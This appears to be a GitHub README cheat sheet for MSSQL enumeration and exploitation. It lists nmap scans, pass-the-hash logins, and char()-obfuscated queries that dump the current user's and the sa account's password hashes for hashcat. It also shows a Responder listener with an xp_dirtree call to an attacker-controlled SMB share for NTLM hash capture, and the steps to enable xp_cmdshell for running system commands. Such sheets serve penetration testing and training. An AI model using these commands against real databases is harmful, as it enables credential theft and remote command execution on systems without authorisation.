Skip to content

Latest commit

 

History

History
93 lines (88 loc) · 2.87 KB

README.md

File metadata and controls

93 lines (88 loc) · 2.87 KB
Raw

MSSQL enumeration and exploitation

Initial enumeration

nmap -vv -p 1433 -sT --script=+ms-sql* <ip>

Connecting to an MSSQL database

  • Connect to a database using mssql-cli:
mssql-cli -U <username> -P '<password>' -d <database> -S "tcp:<ip>,1433"
mssql-cli -U <username> -P '<password>' -d <database> -S "tcp:<ip>,1433" -E # Windows auth
  • Or connect using mssqlclient.py:
mssqlclient.py -db <database> <user>:'<password>'@<ip>
mssqlclient.py -db <database> -windows-auth <user>:'<password>'@<ip> # Windows auth
mssqlclient.py -db <database> -hashes LMHASH:NTHASH <user>@<ip> -windows-auth # Using hashes instead of a password

Enumerating a database

  • Get version:
SELECT @@version;
  • Get current database:
SELECT db_name();
  • List non-default databases:
SELECT name FROM master.sys.databases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb');
  • Get current user:
SELECT original_login();
  • List user permissions:
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
  • Get current user's password hash (encoded for 1731 hashcat mode):
SELECT convert(varchar(MAX),(loginproperty(original_login(),(char(080)+char(097)+char(115)+char(115)+char(119)+char(111)+char(114)+char(100)+char(072)+char(097)+char(115)+char(104))) ),1);
  • List all users:
SELECT name FROM sys.syslogins ORDER BY 1;
  • Get sa user's password hash (encoded for 1731 hashcat mode):
SELECT convert(varchar(MAX),(loginproperty((char(115)+char(97)),(char(080)+char(097)+char(115)+char(115)+char(119)+char(111)+char(114)+char(100)+char(072)+char(097)+char(115)+char(104))) ),1);
  • List tables:
SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1;
  • List table columns:
SELECT column_name FROM information_schema.columns WHERE table_name='<table_name>' ORDER BY 1;
  • Search for %user% like tables:
SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE char(37)+char(117)+char(115)+char(101)+char(114)+char(37) ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY; -- LIMIT/OFFSET works on 2012+ version

Getting NTLM hashes

  • Listen to SMB incoming connections:
sudo responder -I tun0
  • Sending auth SMB request to local machine using SQL:
EXEC xp_dirtree '\\<ip>\test';

Executing system commands

  • Configure (if user has privileges to do it):
EXEC sp_configure 'show advanced options', 1;  
RECONFIGURE;  
EXEC sp_configure 'xp_cmdshell', 1;  
RECONFIGURE;
  • Run commands:
EXEC xp_cmdshell '<command>';